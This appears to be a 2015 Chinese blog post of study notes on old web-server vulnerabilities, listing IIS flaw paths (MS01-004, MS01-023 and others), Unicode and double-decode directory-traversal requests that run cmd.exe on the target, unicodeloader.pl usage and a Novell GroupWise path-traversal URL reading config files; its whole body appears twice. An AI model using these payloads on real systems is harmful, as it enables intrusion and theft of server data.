WEB应用的一些漏洞
2015-10-12 16:45
253 查看
通过netcat进行管道传输,连接到一个脆弱的服务器上
Netcat –vv 网站< htr.txt
URLSCan 一个模板驱动的过滤器,向IIS解析请求
分为两种文件
分别是UrlScan.dll和UrlScan.iniUrlScan.ini为配置文件,
向被拒绝的请求发送http404,目标未发现
阻止攻击者获取任何一点有关目标服务器的信息
+.htr源代码泄露,MS01—004/default.asp+.htr
Web目录路径泄露 /null.idc
服务器端包含缓冲区溢出/file.stm,.shtm,shtml
.printer缓冲区溢出MS01—023/null.printer
索引服务器缓冲区溢出/null.ida,idq
Webhits源泄露MS00—006 /null.htw
Frontpage服务器扩展缓冲区溢出 MS01—035/_vti_bin/_vti_aut/fp3Oreg.dll
IIS目录遍历的脆弱点分别是Unicode和double decode攻击
讨论一些达到初始访问目的的机制,他们可以征服整个系统
GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0 http://网站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
使用软件unicodeloader.pl
unicodeloader.pl 网站:80 C:\inetpub\scripts
Novell GroupWise任意文件的访问
http://网站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00
这种攻击的另一个后果是:即使运行了生产商的补丁,novell安装的路径也会被暴露,同时会攻击者可能会窥视WEBacess目录中的commgr。Cfg和ldap.cfg文件中的敏感信息
Netcat –vv 网站< htr.txt
URLSCan 一个模板驱动的过滤器,向IIS解析请求
分为两种文件
分别是UrlScan.dll和UrlScan.iniUrlScan.ini为配置文件,
向被拒绝的请求发送http404,目标未发现
阻止攻击者获取任何一点有关目标服务器的信息
+.htr源代码泄露,MS01—004/default.asp+.htr
Web目录路径泄露 /null.idc
服务器端包含缓冲区溢出/file.stm,.shtm,shtml
.printer缓冲区溢出MS01—023/null.printer
索引服务器缓冲区溢出/null.ida,idq
Webhits源泄露MS00—006 /null.htw
Frontpage服务器扩展缓冲区溢出 MS01—035/_vti_bin/_vti_aut/fp3Oreg.dll
IIS目录遍历的脆弱点分别是Unicode和double decode攻击
讨论一些达到初始访问目的的机制,他们可以征服整个系统
GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0 http://网站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
使用软件unicodeloader.pl
unicodeloader.pl 网站:80 C:\inetpub\scripts
Novell GroupWise任意文件的访问
http://网站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00
这种攻击的另一个后果是:即使运行了生产商的补丁,novell安装的路径也会被暴露,同时会攻击者可能会窥视WEBacess目录中的commgr。Cfg和ldap.cfg文件中的敏感信息
相关文章推荐
- 小心服务器内存居高不下的元凶--WebAPI服务
- 关于PHP浮点数你应该知道的(All 'bogus' about the float in PHP)
- 运维入门
- [转][源代码]Comex公布JailbreakMe 3.0源代码
- Linux5.9无人值守安装
- 数据中心和云未来的十二大趋势
- 用vsftp快速搭建ftp服务器
- Linux快速构建apache web服务器
- 服务器监控策略浅谈
- 如何降低服务器采购成本 原理分析
- 建议的服务器分区办法
- 服务器托管六大优势分析
- Erlang实现的一个Web服务器代码实例
- 服务器技术全面解析
- 保护DNS服务器的几点方法小结
- 我国成为全球第二大服务器消费国
- 服务器 安全检查要点[星外提供]
- 服务器应用自动重新启动IIS批处理[原创]_DOS/BAT_脚本之家
- FTP 服务器关于权限的问题